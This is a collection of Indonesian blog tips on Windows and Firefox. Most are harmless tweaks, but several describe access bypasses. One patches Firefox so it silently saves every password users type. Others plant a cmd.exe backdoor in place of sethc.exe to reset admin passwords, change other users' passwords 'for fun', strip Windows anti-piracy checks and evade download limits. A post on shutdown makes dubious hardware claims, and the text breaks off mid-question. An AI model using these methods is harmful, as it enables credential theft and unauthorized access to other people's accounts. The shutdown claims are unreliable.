Ketika kita membuka situs – situs yang mengharuskan login maka secara default firefox akan meminta konfirmasi dari kita apakah ingin menyimpan password atau tidak.

ada tiga pilihan yang ditampilkan yaitu :

1. “remember” atau mengingat password kita pada komputer.

2. “never for this site” (tidak pernah menyimpan hanya untuk website itu saja.

3. “not now” ( jangan sekarang, apabila di lain waktu kita mengakses halaman login tersebut
maka akan di tampilkan lagi popup konfirmasi penyimpanan password.

Fasilitas remember tersebut dimaksudkan untuk mempermudah user kita ingin login kembali sehingga tidak perlu memasukkan user name dan password kembali, cukup memilih user account yang telah tersimpan.

bagaimana cara nya agar firefox secara otomatis menyimpan email dan password yang dimasukkan oleh user secara otomatis tanpa mengklik tombol Remember atau telah mengklik Tombol Not Now sekalipun ?

nah begini caranya :

1. tutup firefox dulu.

2. cari file nsLoginManagerPrompter.js di folder “C:\Program Files\Mozilla Firefox\components\”

3. buka file nsLoginManagerPrompter.js dengan menggunakan notepad++ , klo menggunakan notepad biasa susah mencari code
nya nanti.

4. hapus dari baris 642 sampai 711, ganti dengan code di bawah ini.

var pwmgr = this._pwmgr;

pwmgr.addLogin(aLogin);
},











klik save atau “ctrl + s “.

ok itu saja. sekarang coba buka firefox dan coba login ke suatu website seperti facebook.
setelah itu pada menu firefox klik tools -> options -> security -> klik tombol “Saved Passwords” -> “show passwords” yes.

klo tidaka ada kesalahan, maka akan tampil daftar password yang tersimpan otomatis di firefox anda.

sekian dan terima kasih





Baca Selengkapnya......








jadi siapapun ga akan bisa ngambil data dari komputer kamu ...

tapi komputer kamu bisa ngambil data dari si Flashdisk itu...

ini tanpa program atau software khusus , cuma ngutik ngutik Regedit sedikit

selama saya pake ginian, ga pernah ada efek samping buat komputer (pake obat kalee...)
paling buat yang nyolokin Flashdisk aja kebingungan dia ga bisa ngambil data di komputer..

ini cocok buat kamu kamu yg lagi kerjain tugas biar nggak bisa dijiplak orang lain

ini udah saya coba di XP, Vista & 7 dan 100% tested & work

caranya begini ni ...

1. masuk REGEDIT (pencet Windows+R)

2. TrusCari ----> HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control

3. Di folder CONTROL, buat folder dengan nama "StorageDevicePolicies"(tanpa kutip)

4. trus di folder "StorageDevicePolicies", klik kanan>New>DWORD (32-bit)

5. trus key yang baru itu namain : "WriteProtect"

6. Klik 2x Key WriteProtect-nya, trus ganti Value Data jadi 1 (Hexadecimal)

7. Restart deh ....


Untuk menormalkan kembali
tinggal balikin aja Value Data dari key yang namanya "WriteProtect" itu jadi 0

semoga ada manfaatnya


Baca Selengkapnya......










Sistem operasi Windows XP memiliki sebuah fitur yang memungkinkan kita mem-pause aktifitas kita di depan komputer untuk sementara, ya.. fitur “Hibernate” namanya. Dengan fitur ini kita bisa mematikan komputer kita kemudian menghidupkannya lagi dalam keadaan yang sama persis ketika kita meng-hibernate-nya.

Fitur ini sangat berguna terutama untuk para pengguna laptop, contoh kasusnya adalah seperti ketika kita sedang mengerjakan sesuatu dengan membuka banyak program di laptop kita, trus batere laptop kita sudah mau habis, nah daripada kita close satu persatu semua programnya kemudian men-shutdownnya, mendingan kita hibernate saja laptop-nya supaya nanti pas dihidupkan lagi kita tidak perlu capek-capek buka lagi programnya satu persatu.

Kalau untuk komputer desktop (kalau saya tidak salah ya) fitur hibernate ini secara default masih disable, jadi untuk men-enable atau mengaktifkannya kalian harus masuk ke Control Panel, berikut tahapan-tahapan untuk mengaktifkan fitur hibernate di sistem operasi Windows XP:

Klik Start > Control Panel.
Di jendela Control Panel pilih menu “Performance and Maintenance”, kemudian pilih menu “Power Options”.
Di jendela “Power Options Properties” pilih tab menu “Hibernate”, kemudian ceklist pilihan “Enable hibernation” lalu klik tombol “OK”.

Sedangkan untuk meng-hibernate komputer kalian tersebut, caranya adalah dengan menekan tombol “Turn Off Computer” seperti biasa, lalu ketika muncul menu shutdown-nya kalian tekan saja tombol “h” di keyboard kalian, maka secara otomatis komputer kalian pun akan meng-hibernate dirinya.
Bagaimana Cara Mengaktifkan Shortcut Hibernate Pada Desktop Komputer
Nah Sekarang untuk lebih memudahkan kita harus membuat shortcut Hibernate di desktop, caranya adalah silahkan klik kanan dalam halaman desktop anda lalu pilih New -> Shortcut, lalu copy paste tulisan yang berwarna merah ini kedalam kotak yang muncul disana rundll32.exe PowrProf.dll, SetSuspendState (Warning: hati – hati dengan huruf kapital, pastikan harus sama persis, alias tidak kurang ataupun lebih!) lalu klik Next. Lalu rename dengan nama “Hibernate” dan anda dapat mengganti gambar iconnya sesuka anda.

Nah selanjutnya nanti anda hanya tinggal mendouble klik saja disana untuk otomatis lebih mudah mematikan komputer. Atau alternatif lain jika tidak ingin membuat shortcut anda dapat klik Start -> Turn off computer -> Lalu tekan tombol shift (pada keyboard), jangan dilepaskan ya…anda akan melihat perubahan tombol stand by menjadi Hibernate, lalu klik disana.



semoga bermanfaat


Baca Selengkapnya......








Tekan tombol ctrl + alt + del 2X kemudian ganti namanya dengan administrator Enter. Cara ini jika si Empunya komputer tidak mem-password administrator. Jika di password, terpaksa deh kita gunakan jurus pamungkas.
cara ke dua:

Untuk cara ini kita menggunakan software PcLogin. Kita bisa men-download Pc Login Now di internet. File hasilnya adalah dalam bentuk .iso. Setelah kita download kita burning ke CD. Kemudian kita lanjutkan dengan booting lewat PcLogin tadi. Sebelumnya tentu saja kita harus setting terlebih dahulu BIOS agar kita bisa booting lewat cd. Setelah itu proses berjalan. Tunggu sampai muncul tampilan Pc Login Now.

Kemudian tinggal kita ikuti saja perintah selanjutnya…


semoga bermanfaat

Baca Selengkapnya......








1.Matikan terlebih dahulu System Restore pada semua drive ( My Computer, Properties, System Restore, beri centang pada Turn off System Restore on All Drives

2.Matikan proses “wscript.exe” (Task manager. services, wscript.exe, klik kanan pada wscript exe, end process/end process tree)

3.Buka windows explorer, klik menu “Tool” lalu pilih “Folder Option”, selanjutnya pada tab “View” klik “Show hidden files and folders”, hilangkan tanda contreng pada “Hide extensions for known file types” dan hilangkan juga tanda contreng pada Hide protected operating system files. Klik OK.

4.Klik tombol “Search”, Klik All Files and Folders, Pada bagian All or part of the file name ketik : Autorun.inf, pada bagian Look in klik “My Computer”, lalu beri centang semua pada bagian More Advanced Options lalu hapus semua file yang telah ditemukan

5.Setelah Proses pada No. 4 selesai, lakukan proses sama seperti No. 4. Tapi pada kolom All or Part of the file name di isi dengan Dekstop.ini. Hapus juga file ini.

6.Setelah Proses pada No. 5 selesai, lakukan proses sama seperti No. 4. Tapi pada kolom All or Part of the file name di isi dengan *.lnk >>>( LNK bukan ink ). Hapus juga file ini. tapi kamu harus hati-hati jangan sampai salah menghapus, Ciri dari shortcut folder yang dibuat oleh virus yaitu ketika kita menunjuk folder tersebut maka akan muncul link dari shortcut tersebut yaitu ke arah windows/system32, itu adalah shortcut yang harus kita hapus

Catatan:ketika anda mencoba menghapus file tersebut anda harus tau file tersebut terletak dimana seperti D:/ atau C:/ file yang letaknya disitu jangan anda hapus bisanya file tersebut ada di flashdisk G:/ dan juga nada harus hapus file itu satu persatu dan jangan lupa mengunakan antivirus yang sudah terupdate dan terbaru karna itu juga akan membantu anda


semoga bermanfaat


Baca Selengkapnya......











berikut step per step ngebasmi Tuh virus..

1. Virus ini menyerang sejak dari pertama kali masuk windows. jadi gak bisa masuk ke desktop windows karena diblok sama ni virus. (menurut mbah gugel suruh masuk lewat safe mode tapi pas dicoba gak bisa ngapa2in >> tiap komputer beda2 sih!!)
ikuti aja untuk men-scan komputer....

2. setelah "CT" melakukan scanning. klik aja terus tanda X dipojok kanan untuk menutup aplikasi... sampai terlihat desktop komputer kita. >> tapi tetep aja semua bentuk aplikasi selain tampilan tu virus gak bisa dijalankan.

3. tekan terus Alt+Ctr+Del untuk menampilkan Task Manager (kalau ditekan sekali akan langsung hilang karena diblok sama virus). pas ditekan terus maka Task Manager akan muncul hilang - muncul hilang (berkedip2). saat berkedip2 itu arahkan mouse pada tombol "end task" dan klik scr berulang2 sampai menutup aplikasi "CT"

4. setelah aplikasi "CT" tertutup.. saatnya balas dendam!!!
klik start -> search -> ketik di kolom all file and folder : gog (tanpa * *)
setelah didapat tempat tuh virus nongkrong... (biasanya di C:\Documents and Settings\My Documents\Application Data\gog.exe). langsung aja di delete....

kok gak bisa?? >> biasanya emang gak bisa sih soalnya masih dalam bentuk "exe" harus diubah dulu ekstensinya.

5. Klik Start menu, Klik Accessories, Klik Command Prompt.

di Command Prompt yang terbuka lakukan command berikut --> C\Documents and Settings\Owner\

Ketik:
cd Application Data
Tekan Enter

Kemudian
Ketik :
rename gog.exe gog.txt
Tekan Enter

****[jika tempat virusnya beda, di jendela command prompt, ketik "cd" (tanpa tanda petik) dan ketik lokasi virusnya, kemudian tekan Enter, kemudian ketik "rename gog.exe gog.txt", dan tekan Enter.]

Taraaaa....... gog.exe berubah menjadi gog.txt

6. tinggal delete aja tuh virus gan... pakenya yang Shift+Del..!! kalau nggak recycle bin harus segera dikosongkan....



Semoga bermanfaat bro.....



Baca Selengkapnya......









Jika kita mengarahkan pointer pada icon My Computer di desktop, maka akan
muncul ‘Info Tip’ yang menampilkan informasi tentang icon tersebut.
Jika kita merasa bosan pada tampilan Info Tip tersebut, maka kita bisa
mengubahnya atau membuat pesan-pesan sendiri. Caranya:

1. Klik Start/Run, ketik ‘regedit’ lalu klik OK.

2. Kemudian arahkan ke HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

3. Cari string value InfoTip lalu klik dua kali pada string value tersebut.

4. Selanjutnya akan tampil dialog Edit String. Pada value data, kita bisa isi kata-kata kita sendiri yang sesuai dengan yang kita inginkan

5. Jika sudah, klik OK dan restart komputer kamu



selamat mencoba


Baca Selengkapnya......








Ada banyak cara yg untuk mengakses instalasi Windows klo misalkan kamu lupa password administratornya dengan mereset kembali password Windows. Disini kita akan coba cara mereset password dgn mengganti aplikasi Sticky Keys bawaan Windows. Dengan Sticky Keys kita bisa gunakan tombol CTRL, SHIFT, ALT atau tombol Logo Windows dgn kombinasi tombol lain selain itu.

Cara reset password ini ane bilang lebih praktis karna kita tdk butuh software lain + mudah dipakai karna tdk pakai hack2 Registry segala. Namun, sama seperti cara lain, cara resetting password akun admin Windows ini mengharuskan kamu untuk boot dari OS lainnya (OS ke-2) untuk bisa mengakses instalasi Windows target kamu sewaktu offline.

Agan bisa pakai flashdisk USB Windows PE bootable atau pakai Windows RE (Recovery Environment). Cara menjalankan Windows RE : Booting dari DVD instalasi Windows Vista/7 agan terus dari pilihan boot yg muncul, pilih “Repair”.

Oiya, kamu tdk bisa menggunakan XP boot CD untuk cara ini karna nanti Recovery Console-nya pasti akan menanyakan password offline instalasi. Tapi sebaliknya, kamu bisa pakai DVD instalasi Vista/7 untuk reset password admin Windows kamu di Windows XP. Itu karena di Windows RE yg berbasis Vista atau Win7, kamu bisa akses command prompt untuk masuk ke instalasi Windows walaupun tanpa password.
Langsung saja, bro...!

1. Boot ke Windows PE atau Windows RE trus buka command promptnya. Untuk masuk ke command prompt, tekan F8 sewaktu Windows boot trus pilih opsi "Recovery your computer". Trus, dari jendela "System recovery Options" yg muncul, pilih/klik "Command Prompt".

2. Cari tahu huruf drive partisi yg terinstal Windows. Biasanya kalau pd Vista atau XP di C:, klo untuk Windows 7 biasanya di D:\ (karna C:-nya sdh diisi partisi Startup biasanya). Untuk mengetahui huruf drive-nya, ketik C: (atau D trus cari folder yg namanya "Windows". Windows RE/PE biasanya ada di huruf X:.

3. Ketik command berikut (ganti huruf “c:” dgn huruf drive partisi agan yg terinstal Windows).
copy c:\windows\system32\sethc.exe c:\

• Command diatas akan membuat copyan file "sethc.exe" untuk nanti kita pakai restore.
• Ketik lg ini untuk mengganti "sethc.exe" dgn "cmd.exe":

copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

• Restart komputer, trus jalankan instalasi Windows dimana agan lupa password admin-nya.
• Kalo sudah muncul logon screen Windows, tekan tombol SHIFT 5 kali.
• Ketik command berikut di command prompt yg ada untuk mereset password:

net user nama_username_kamu password_baru_kamu

Klo agan lupa username kamu, ketik saja

net user

• untuk liat daftar username yg ada.
• Sekarang kamu sudah bisa log on dgn password yg baru tanpa harus pake software lain.

Ane saranin agan ganti file "sethc.exe" dgn file yg sdh kamu copy pd langkah no.2 diatas (ada di root drive windows agan). Klo mau seperti itu, mesti boot lagi dari Windows RE trus ketik command ini:

copy /y c:\sethc.exe c:\windows\system32\sethc.exe



Semoga berhasil...




Baca Selengkapnya......









Oke nih bagi yang suka usil, gimana caranya ganti password user lain
atau administrator dalam 1 pc, tanpa menggunakan software...

- Pertama-tama kita harus login dulu, seperti disini saya login dengan user "Rere"

- Masuk menu "run" dan ketik "cmd" ===> tanpa tanda petik...!

- cmd, ketik "net user" ===> tanpa tanda petik...!

-Disana akan muncul smua nama User yang ada pada komputer, pilih salah satu target user (disini target : Liteos), bisa juga digunakan pada "Administrator"
ketik "net user Liteos *" ===> tanpa tanda petik...!

- - disitu akan muncul konfirmasi password, masukkan password sesuka hati... kemudian ketik "Exit"

- - Logoff komputer dan masuk sebagai User yang telah kita ganti passwordnya tadi...

Sukses.......


Baca Selengkapnya......








Antivirus merupakan perangkat lunak (software) yang digunakan untuk mendeteksi, mengkarantina, dan menghapus virus komputer baik dari file-file sistem komputer ataupun dari file-file data dan program yang teinfeksi. Virus sendiri sebenarnya merupakan program yang sengaja dibuat untuk merusak atau menggangu suatu aplikasi atau data sehingga program dan data tesebut tidak dalam kondisi normal bahkan bisa rusak.


1.AVG Antivirus
Antivirus AVG (Antivirus Gratis dan Berbayar)

Kelebihan Antivirus AVG:
1. Instalasi AVG cukup mudah..
2. Auto update selama online (scheduled update).
3. AVG bisa diinstall pada browser Mozilla Firefox sebagai plugin sehingga surfing lebih aman.
4. Scanning virus cepat.
5. Memory yang dipakai pada PC tidak terlalu banyak.
6. Resident option tidak memperlambat kerja komputer.
7. Memiliki fiture Anti Spyware, Link-Scanner, Email-Scanner.
8. Anti Spam
9. Game Mode
10. Anti Rootkit Protection

Kekurangan antivirus AVG:
1. Instalasi pertama cukup lama apalagi untuk versi terbaru (AVG 9)
2. Cara setting pengoperasian sedikit lebih rumit.
3. File yang terkena virus biasanya dihapus oleh AVG bersama dengan virusnya.
4. AVG biasanya bergantung pada sytem operasi komputer yang digunakan.
5. AVG Terkadang menganggap file yang ber-extension EXE sebagai virus terutama pada file crack.
6. Update AVG bisa lama.


2.AVIRA Antivirus
Antivirus AVIRA (Antivirus Gratis dan Berbayar)

Kelebihan Antivirus AVIRA :
1. Snanning virus lebih cepat dan teliti.
2. AVIRA dapat mendeteksi virus-virus yang biasanya tidak terdeteksi oleh antivirus yang lain.
3. Setting option pada AVIRA lebih mudah (aktif/ non aktif antivirus)
4. AVIRA tidak memberatkan komputer.
5. Update lebih cepat.
6. AVIRA memiliki opsi pencarian nama virus.
7. memiliki fiture Schedule option.
8. AVIRA memiliki Anti Spyware

Kelemahan Antivirus AVIRA:
1. Seeperti AVG, AVIRA terkadang menganggap file yang ber-extension EXE sebagai virus terutama pada file-file crack dan keygen.
2. AVIRA memiliki kapasitas file untuk update manual cukup besar didownload.


3.KASPERSKY Antivirus
Antivirus Kaspersky (Antivirus Berbayar)

Kelebihan Antivirus Kaspersky :
1. Kaspersky memiliki Scheduled Update (3 jam sekali).
2. Musah dioperasikan.
3. Tampilan Kaspersky cukup bagus dan menarik.
4. Memiliki fiture suara.
5. Memiliki fiture self defense (password protection).
6. Memiliki Anti malware
7. Kaspersky memiliky system restore.


Kekurangan Antivirus Kaspersky :
1. Loading awal lebih lama.
2. Proses scanning relatif lama.
3. Kaspersky tidak ada versi gratis.
4. Update cukup lama.
5. Mode resident Kaspersky sedikit memperlambat kerja komputer.


4.PCMAV Antivirus
Antivirus PCMAV (Antivirus Gratis)

Kelebihan Antivirus PCMAC (PC Media Antivirus):
1. Scanning cepat.
2. PCMAV dapat menghapus virus tanpa merusak atau menghapus file yang terinfeksi.
3. PCMAV memiliki opsi karantina jika virus tidak bisa dihapus.
4. Automatic update.
5. Mudah dioperasikan.
6. PCMAV mampu mendeteksi virus-virus lokal dan luar.

Kekurangan Antivirus PCMAV:
1. Loading awal PCAMAV relatif lama.
2. PCMAV membutuhkan database tambahan (CLAMAV).
3. Membuat komputer lambat saat mode resident.
4. PCMAV sering dianggap virus oleh oleh Antivirus yang lain.
5. Antivirus PCMAV mudah terkena virus.


5.SMADAV Antivirus
Antivirus Smadav (Antivirus Gratis)

Kelebihan Antivirus Smadav:
1. Smadav mudah sekali dioperasikan.
2. Proses scanning sangat cepat
3. Bisa digunakan secara instant (versi sebelumnya) tanpa harus di-install di PC dengan mode resident.
4. Smadav support bahasa Indonesia dan Inggris
5. Memiliki versi Pro yang 10x lebih cepat (SMAD-TURBO) dengan automatic update.
6. Autoscan flashdish sangat cepat.
7. Theme pada Smadav bisa diganti.
8. Loading carantine lebih cepat.
9. Smadav dapat mendeteksi virus lokal dan virus luar.
10. Filenya Smadav kecil dan ringan sehingga tidak memberatkan komputer.
11. Smadav bisa digabung dengan antivirus yang lain termasuk antivirus buatan luar pada satu PC.

Kekurangan Antivirus Smadav:
1. Smadav masih belum mampu membersihkan virus impor secara tuntas seperti Conficker, sality, Alman, hanya mampu mencegahnya menginfeksi komputer
2. Scan registry akan di-disable untuk Smadav Pro yang di-password


6.ANSAV Antivirus
Antivirus ANSAV (Antivirus Gratis)

Kelebihan Antivirus ANSAV:
1. ANSAV memiliki forum yang cukup besar (Ansaver) dan sering mengadakan seminar sehingga bisa berdiskusi dan memperkenalkan virus baru untuk ditindak lanjuti programmer sebagai update database.
2. Residen proteksi pada Smadav lebih sensitif.
3. ANSAV akan mendeteksi virus tidak hanya pada database.

Kekurangan Antivirus ANSAV:
1. ANSAV tidak bisa digabung dengan antivirus import dalam satu PC.
2. ANSAV memiliki fiture plug-in untuk membatu perkembangan tool ANSAV. Fiture ini bisa diciptakan oleh siapa saja.
3. ANSAV sering tidak tuntas dalam membersihkan virus terutama pada registry.
4. File yang terinfeksi sering ikut terhapus bersama dengan virus.

7.AVAST Antivirus
Antivirus AVAST (Antivirus Gratis dan Berbayar)

Kelebihan Antivirus AVAST :
1. Avast Home Edition menawarkan anti virus, worm, trojan, boot time scanner, feature screen saver scaner membuat antivirus ini dapat bekerja sebagai screen saver
2. Scanning cepat
3. Tampilan AVAST cukup menarik
4. Online update
5. Compatible Windows XP, Vista, Seven
6. AVAST menggabungkan teknologi anti-spyware dengan jaminan dari West Coast Lab’s Checkmark process dan anti-rootkit nya
7. Realtime protection
8. Memiliki fiture karatina
9. AVAST bisa digunakan sebagai screen saver

Kekurangan Antivirus AVAST :
1. AVAST belum memiliki file update offline sehingga update harus dalam keadaan online.
2. Seleksi virus lokal kurang handal
3. Terkadang AVAST tidak bisa heal virus infection.


by karmaus


Baca Selengkapnya......









Rapidshare adalah suatu server hosting yang sudah terkenal. rapidshare juga biasa digunakan untuk netter menyimpan file-file yang siap diunduh. Tapi untuk kita seorang downloader, biasanya limit download sangat mengganggu.

Cara menghilangkan limit download atau Time Delay di rapisdhare cukup mudah, tanpa menggunakan software atau pihak ketiga. Remote Upload untuk rapid*share juga tidak bisa. Jadi kita harus mengakali agar mempermudah mendapatkan file.
Langkah-langkah

Buka Notepad.
Masukkan kode berikut ini.


@ ECHO OFF
ipconfig /release
ipconfig /flushdns
ipconfig /setclassid
ipconfig /registerdns
ipconfig /renew
EXIT

Save file dengan nama apa saja menggunakan ekstensi *.bat misalnya newip.bat
Download dulu sebuah file di rapid*share, kemudian jalankan file yang berekstensi *.bat tersebut.
Ganti tanggal pada komputer / PC kita, dengan begitu kita bisa download di rapid*share tanpa menunggu lagi.



semoga bermanfaat


Baca Selengkapnya......









Mungkin kamu terkadang tidak sengaja melakukan update windows, sehingga windows kamu ke deteck bajakan, kemudian di pasang cap bajakan oleh windows. maklumLah... tau sendirikan berapa harga windows yang asli..hehe..

Nah berikut ada cara untuk menghilangkan cap tersebut

1. Buka RegEdit.
Cari di regedit:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify

2. Delete folder ‘WgaLogon’ dan semua isi nya

3. Restart Windows XP anda

4. Masuk ke safe mode dengan menekan F8 saat booting

5. Hapus file-file berikut :

C:\WINDOWS\system32\WgaLogon.dll
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\system32\LegitCheckControl.dll

Jangan lupa menonaktifkan automatic updatenya >> klik kanan MyComputer >> Klik tab Automatic Update >> Pilih Turn Off.


semoga bermaanfaat..



Baca Selengkapnya......










1. Start, Run, 'Regedit'.

2. Tekan 'Ctrl' + 'F' untuk membuka menemukan kotak dan ketik untuk mencari 'Recycle Bin'.

3. Mengubah data nilai apapun dengan 'Recycle Bin' untuk nama apapun yang Anda ingin memberikannya (yaitu, seperti 'Sampah Bisa' atau 'Dump' etc).

4. Tekan F3 untuk melanjutkan mencari "Recycle Bin" dan mengubah dimanapun Anda datang di 'Recycle Bin' untuk nama baru yang baru.

5. Ulangi langkah 4 sampai Anda selesai dengan mencari dan mengubah semua nilai ke nama baru.

6. Tutup regedit dan tekan F5 pada desktop untuk melihat nama baru di layar.

Catatan: Sebagai praktek yang baik, selalu backup registry sebelum merubah apa pun meskipun mengubah nama 'Recycle Bin' adalah tweak doesnt sederhana dan mempengaruhi hal lain


semoga bermanfaat


Baca Selengkapnya......









Menurut saya mengedit registry pada windows XP cukup mudah, hanya saja bila kita ingin mengotak-atik registry sama saja kita ingin mengotak-atik windows XP kita. Oleh karena itu untuk menghindari kemungkinan adanya trouble maka alangkah baiknya kita untuk melakukan back up terlebih dahulu. Menurut sumber yang saya percaya sebagian besar dari registry ini hasilnya sudah lumayan dan bisa untuk menambah kecepatan dan keamanan komputer. Tapi tidak semuanya bentuk registry saya tampilkan, yang saya tampilkan yang menurut saya penting saja. Hehe.. Selamat Mencoba

Langkahnya adalah :

1. Klik tombol Start > Run. Ketik regedit dan tekan Enter setelah berada didalam jendela Run.
2. Didalam Registry Editor, pilih menu File > Export.
3. Setelah Export Registry File muncul, masukkan nama file ke bagian File Name, misalnya backup-registry dan sebagainya. tekan tombol Save.


Mempercepat Update Registry
Tekan tombol Start > Log Off > Log Off.

Menyembunyikan Recycle Bin
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace Hapus subkey {645FF040-5081-101B-9F08-00AA002F954E}, kemudian Restart komputer untuk melihat hasilnya. Untuk memunculkannya kembali, buat kembali kombinasi angka {645FF040-5081-101B-9F08-00AA002F954E}.

Mengembalikan Folder Documents Yang Hilang Di My Computer
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/DocFolderPaths Pilih menu Edit > New > String Value dan beri nama sesuai dengan username yang digunakan di Windows (contohnya: Chippers) Klik ganda pada value tersebut dan masukkan path tempat dimana Documents anda berada (contohnya D:\Documents)

Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer Klik menu Edit > New > DWORD Value dan beri nama NoRecentDocsMenu. Kemudian klik ganda pada DWORD Value tersebut, dan berikan angka 1 untuk mengaktifkannya.

Menyembunyikan Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRun. Klik ganda dan masukkan angka 1 sebagai Value Data.

Restart dgn Cepat !!
Pada key :
HKEY_LOCAL_MACHINE | Software | Microsoft | Windoes NT | Current Version | Winlogon
Tambahkan string value EnableQuickReboot dan isi defautnya dengan 1

Menyembunyikan Control Panel Dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari value bernama Start_ShowControlPanel dan klik ganda pada bagian tersebut.
Masukkan angka 0 pada Value Data.

Membuat Desktop Lebih Stabil
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
Buat sebuah DWORD Value baru dan beri nama DesktopProcess.
Klik ganda DesktopProcess dan masukkan angka 1 pada Value Data.

Menonaktifkan Klik-kanan Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoViewContextMenu.
Klik ganda pada NoViewContextMenu dan masukkan angka 1 pada Value Data.

Menonaktifkan Menu Properties My Computer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoPropertiesMyComputer.
Klik ganda NoPropertiesMyComputer dan masukkan angka 1 pada Value Data.
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoPropertiesMyComputer.
Klik ganda NoPropertiesMyComputer dan masukkan angka 1 pada Value Data.
Jika key Explorer tidak ada, buat yang baru dengan mengklik menu Edit > New > Key dan beri nama Explorer.

Mengubah Tombol Kiri Menjadi Tombol Kanan Pada Mouse
HKEY_CURRENT_USER/Control Panel/Mouse
Klik ganda pada SwapMouseButtons dan beri angka 1 pada Value Data.

Menyembunyikan Drive
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Pilih Edit > New > DWORD Value dan beri nama NoDrives.
Klik ganda NoDrives dan tentukan drive mana yang ingin dihilangkan pada Value Data.
Contoh: jika ingin menghilangkan drive E:, masukkan angka 16 pada Value Data.
Kombinasi angka pada Value Data adalah sebagai berikut:
A: > 1
B: > 2
C: > 4
D: > 8
E: > 16
F: > 32
G: > 64
H: > 128
I: > 256
J: > 512
K: > 1024
L: > 2048
M: > 4096
Semua: > 67108863

Mempercepat Proses Shutdown Windows XP
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control
Klik ganda WaitToKillServiceTimeout dan ubah nilainya menjadi lebih rendah dari 2000.

Menonaktifkan Task Manager
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System
Buatlah DWORD Value baru dan beri nama DisableTaskMgr.
Klik ganda DisableTaskMgr dan masukkan 1 pada Value Data.

Semoga ada manfaatnya


Baca Selengkapnya......









1.Pada saat proses Shut down komputer akan meregistrasi
ulang komponen komputer yang
terpakai (digunakan) dan software serta data yang dipakai
atau yang di delete.
Kalau kita mematikan komputer secara langsung,maka
komponen atau software serta data yang digunakan tidak dapat disimpan kedalam registri,
sehingga bila terjadi masalah pada komputer maka komputer tidak dapat menjalankan system
recovery berdasarkan tanggal atau waktu yang di tetapkan.
tidak ada yg diregistrasi apalagi masalah data yg terhapus tidak ada relevansinya, namun yg terjadi adalah saving setting and konfigurasi terakhir menyangkut system untuk disimpan pada profil account user yg login. system recovery yg dimaksud adalah system restore dimana checkpoint tidak dilakukan saat shutdown, tapi dilakukan saat ada perubahan mendasar yg terjadi pada system misal instalasi program atau update driver. dan lagi system restore sama sekali tidak menjamah data user.




2. Pada saat proses Shutdown, processor memberikan perintah
kepada bios untuk
menghentikan segala pekerjaan- pekerjaan komponen peralatan,
sehingga arus atau daya yang terpakai diputus secara normal.
Tapi kalau kita mematikan langsung maka komponen komputer secara mendadak mati tanpa pemutusan arus secara normal sehingga lama kelamaan akan menimbulkan kerusakan pada komponen komputer.


3. Pada saat proses Shutdown fan komputer akan bekerja dua kali lebih cepat untuk proses pendinginan processor, kalau
kita mematikan komputer secara langsung, maka pendinginan
processor tidak bekerja secara normal maka lama-kelamaan
processor bisa rusak.
saat shutdown terjadi aktifitas saving setting and konfigurasi termasuk deleteting cached atau page file tergantung settingan. karena cukup menguras resources maka suhu processor meningkat dan system power management macam EIST atau C&Q AMD atau smart fan bekerja. makanya fan intake ikut meningkat putarannya.[/quote]

4. Pada saat proses Shutdown system memory akan dikosongkan,sehingga pada saat komputer dipakai lagi maka
memory sudah benar-benar dalam keadaan refresh, kalau kita
mematikan komputer secara langsung maka besar kemungkinan memory bisa rusak.


5. Pada saat proses Shutdown hard disk bekerja untuk menyimpan data yang
diperintahkan processor serta menyalin data komponen serta software kedalam
registry komputer, kemudian head harddisk akan kembali ke posisi awal (ke posisi tidak
membaca hard disk).
Kalau kita mematikan komputer secara langsung maka selain
data komponen dan software tidak tersimpan pada registry, juga posisi head hard disk
berada di tengah-tengah silinder
hard disk, sehingga pada saat dihidupkan kembali komputer
dapat merusak silinder hard disk
sehingga terjadi Bad sector hard disk, lama kelamaan akan
menyebabkan hard disk rusak.


Itulah sebabnya mengapa pada
saat proses Shutdown komputer lama untuk mati. Oleh sebab itu
hendaknya jika mematikan komputer harus melakukan
proses Shutdown terlebih dahulu, bila kita tidak ingin ada
masalah kerusakan pada system komputer, baik software maupun hardware nya.


semoga bermanfaat


Baca Selengkapnya......









Keyboard merupakan salah satu perangkat yang sering kita pakai pada saat menggunakan komputer.
Disini saya memberikan beberapa cara untuk mengetest apakah keyboard anda benar-benar handal atau tidak.

Anda cukup mengetikkan kalimat the quick brown fox jumps over the lazy dog tetapi dengan cara-cara sebagai berikut :

1. Buka notepad anda.

2. Tekan dan tahan tombol shift kiri dan shift kanan.

3. Ketik kalimat the quick brown fox jumps over the lazy dog. (Ingat tombol shift kiri dan shift kanan jangan di lepas).

4. Lihat apakah tulisan yang keluar lengkap sesuai dengan kata-kata di atas atau ada huruf yang hilang.

5. Semakin banyak huruf yang tidak keluar, maka semakin jelek kualitas keyboard anda.

Mengapa harus menulis kalimat the quick brown fox jumps over the lazy dog ?
